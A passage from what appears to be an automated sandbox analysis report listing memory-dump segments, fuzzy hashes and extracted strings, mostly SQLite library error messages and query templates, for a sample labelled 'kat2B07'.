                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                • API String ID: 0-860711957
                                                                • Opcode ID: 044d62dfe33330cf7c323d3209777318f74d2a39d5ad9b1c17300aa8df55342e
                                                                • Instruction ID: 74eb6cc5f4838edf92c1cb7575fdcbdba2b8072515c8c46271e93412623877f5
                                                                • Opcode Fuzzy Hash: 044d62dfe33330cf7c323d3209777318f74d2a39d5ad9b1c17300aa8df55342e
                                                                • Instruction Fuzzy Hash: B212E2B4904741ABE7218F28DC48B6B77E4BF45318F014A2CFD9987342E776E4068BA3
                                                                Strings
                                                                • _shape does not contain a valid polygon, xrefs: 1D746816
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: _shape does not contain a valid polygon
                                                                • API String ID: 0-1814939628
                                                                • Opcode ID: 1ed3f23c7921d0abacd90dfc54f03eac3434c13759e5f360ec09097d0bc1aa3a
                                                                • Instruction ID: 0a197041e102b68f536f82c0711a5590660cff53280b647538297932fa0346c8
                                                                • Opcode Fuzzy Hash: 1ed3f23c7921d0abacd90dfc54f03eac3434c13759e5f360ec09097d0bc1aa3a
                                                                • Instruction Fuzzy Hash: 3EE1E1B5908301DFC312DF14D880AAFBBE8AF85724F25892EF99957211E731E944CB93
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ASC$DESC$SELECT %s ORDER BY rowid %s$SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s
                                                                • API String ID: 0-3496276579
                                                                • Opcode ID: b7d694da6d7e88af0f7f2d05e6b1d36fa555fa608f8c6d2bd131ddf6cbf1244e
                                                                • Instruction ID: a85d6bdb5ffcb10429fb16d4fa2d09a3ccc7d77631a75ccf0ed3cce6033ad020
                                                                • Opcode Fuzzy Hash: b7d694da6d7e88af0f7f2d05e6b1d36fa555fa608f8c6d2bd131ddf6cbf1244e
                                                                • Instruction Fuzzy Hash: 4AC13EB59047429BCB218F24D84177AB7E0FF84320F54492FE98A8B651E736F645CBA3
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1e66a21434f01ce9f9dc559e5aaf4e0a14aa2fa552e2ee390db90852ef5f0481
                                                                • Instruction ID: 2fb2be4141dade677356b88f02c4516c06afa623f47487507beec5fbf810d3ad
                                                                • Opcode Fuzzy Hash: 1e66a21434f01ce9f9dc559e5aaf4e0a14aa2fa552e2ee390db90852ef5f0481
                                                                • Instruction Fuzzy Hash: 6F81E775608201AFD710DF6CDC84B6BB3E9EF84224F4A092EFA8597251F671E901C793
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: e
                                                                • API String ID: 0-4024072794
                                                                • Opcode ID: 36bf8875baaf085edaede92fcfbfd96a80b42455c8294c9340591cc07f665f1e
                                                                • Instruction ID: dbff207e4c348e289a36ca7233b6b9160c9409b09b6d662ae349c8624e999312
                                                                • Opcode Fuzzy Hash: 36bf8875baaf085edaede92fcfbfd96a80b42455c8294c9340591cc07f665f1e
                                                                • Instruction Fuzzy Hash: 1D5127726082519FEB05CF28EC84A77B7E5EF85222F10066AFD8586161F731E854C7A2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %lld %lld
                                                                • API String ID: 0-3794783949
                                                                • Opcode ID: 48a7add09e03fe1c98781065b71f8ddbdaf80c47da621aeed95701e6d74b12d6
                                                                • Instruction ID: fa6c223612c4ea75fd4ce01e6bfff93f1a01bfe9a57b1fb714eafeecef657ef9
                                                                • Opcode Fuzzy Hash: 48a7add09e03fe1c98781065b71f8ddbdaf80c47da621aeed95701e6d74b12d6
                                                                • Instruction Fuzzy Hash: BD31F575308210BFE7115B28DC49F6B77BADFC0721F154919FA8492262E672E911C7A3
                                                                Strings
                                                                • misuse, xrefs: 1D8515AC
                                                                • API called with NULL prepared statement, xrefs: 1D851571
                                                                • API called with finalized prepared statement, xrefs: 1D851586
                                                                • %s at line %d of [%.10s], xrefs: 1D8515B1
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D8515A2
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                • API String ID: 0-860711957
                                                                • Opcode ID: 57f072ebc87944aed65e3d20c31f19704b52196c8ad22324d3f36c7f048c2808
                                                                • Instruction ID: 3779823a7c42f14792359dfab789bb09ab70a9b79c85ce656dc8bb8abac76d80
                                                                • Opcode Fuzzy Hash: 57f072ebc87944aed65e3d20c31f19704b52196c8ad22324d3f36c7f048c2808
                                                                • Instruction Fuzzy Hash: 6FC114B4A047419BE7218F29DC88B6B77E4BF40354F05476CF99A8B242E775E448CBA3
                                                                Strings
                                                                • misuse, xrefs: 1D85D5E7
                                                                • API called with NULL prepared statement, xrefs: 1D85D5AC
                                                                • API called with finalized prepared statement, xrefs: 1D85D5C1
                                                                • %s at line %d of [%.10s], xrefs: 1D85D5EC
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D85D5DD
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                • API String ID: 0-860711957
                                                                • Opcode ID: 82e02b3d443d4aef416de42cf9e98529a3d0528ac874baa6ed79ecdca66d5565
                                                                • Instruction ID: a3167761a1cc4260e9f25f795d57ca12484d307770f38bdee86d322571965670
                                                                • Opcode Fuzzy Hash: 82e02b3d443d4aef416de42cf9e98529a3d0528ac874baa6ed79ecdca66d5565
                                                                • Instruction Fuzzy Hash: E1B1BFB45047029FE7118F29D884B6B77E4BF44318F04896CED9A8B352E775E44B8BA3
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 68484cc7469c99d903bf9edf73bb479617e252e70951ce4efe21bc42cbb02a87
                                                                • Instruction ID: 48fd8b0a2e34f9ee67279dd6ca1c606f2c4a29f717977091bc5ae7ef6f287708
                                                                • Opcode Fuzzy Hash: 68484cc7469c99d903bf9edf73bb479617e252e70951ce4efe21bc42cbb02a87
                                                                • Instruction Fuzzy Hash: 67F103B45083029FC3119F68DCC8A2B77F8EF862A5F04066DF9588A251E775E549CBB3
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb45aa2e08baa498ebe91cfe7ae79313977acb9fa803fc950ef5230f7c508d6b
                                                                • Instruction ID: c513ca8d74c452e13d30e7d6c8b7509e782594cb2fc51e70ac132da194876677
                                                                • Opcode Fuzzy Hash: bb45aa2e08baa498ebe91cfe7ae79313977acb9fa803fc950ef5230f7c508d6b
                                                                • Instruction Fuzzy Hash: 03029372908311AFD7118F64C884B6BB7F8BB85360F094B2AFA4997250D739D954CB93
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 961597b0b65e3b3247cdcb39cf2be22544e9b9921fb3f39a5903e9cdb43485be
                                                                • Instruction ID: eafa999eb63c0b385d87b84689bdc57f722693759c51842b5e400f7aa273178e
                                                                • Opcode Fuzzy Hash: 961597b0b65e3b3247cdcb39cf2be22544e9b9921fb3f39a5903e9cdb43485be
                                                                • Instruction Fuzzy Hash: A8C186B6E1834A5FE7018A18CC927EB7791FB81270F88062FE589872A2F125B545D783
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 67210f30a2c3483343178882be2d0f089af4009b8ed837178bbf696fed5c4ece
                                                                • Instruction ID: 881ad349a92f30ef7bb4baaf48c8f691bce9d2af92e418dde797c726c9d09d1a
                                                                • Opcode Fuzzy Hash: 67210f30a2c3483343178882be2d0f089af4009b8ed837178bbf696fed5c4ece
                                                                • Instruction Fuzzy Hash: 72E11671808311AFEB01DF25D880A2BF7E4BF466A4F048A5AFD4597611F731E854CBA3
                                                                Strings
                                                                • REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 1D7D5264
                                                                • , xrefs: 1D7D5334
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
                                                                • API String ID: 0-69911113
                                                                • Opcode ID: 0a44f7c2c7864f00c2c0bb5e8764be8df9483470b8e7e78f4e62f11e68e2f0aa
                                                                • Instruction ID: b6d7273726383b72a4cc260fb17bd91340fd2ec0cc7d2509e411e86061648bc4
                                                                • Opcode Fuzzy Hash: 0a44f7c2c7864f00c2c0bb5e8764be8df9483470b8e7e78f4e62f11e68e2f0aa
                                                                • Instruction Fuzzy Hash: 4141A0B5904701AFD740DF29DC84B6AB7E5FF88358F060929F988A7211D371F910CB92
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
                                                                • Instruction ID: fb4d3ada794aee3eea3c1f4d7eea4c172d40472f2c982cf58661e74d30879b76
                                                                • Opcode Fuzzy Hash: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
                                                                • Instruction Fuzzy Hash: 1441D3B5600702AFCB019F28DC8496BB7F8FF45321F01462DF96886621E771E915CBA3
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 178d87df47086a60de30caf649a3059a3b0dcb840f5e7811d78661b9ffd68d0f
                                                                • Instruction ID: fbc5df52526956c990428c26e4aede2ad260dd4b027a1b82070a525db959db92
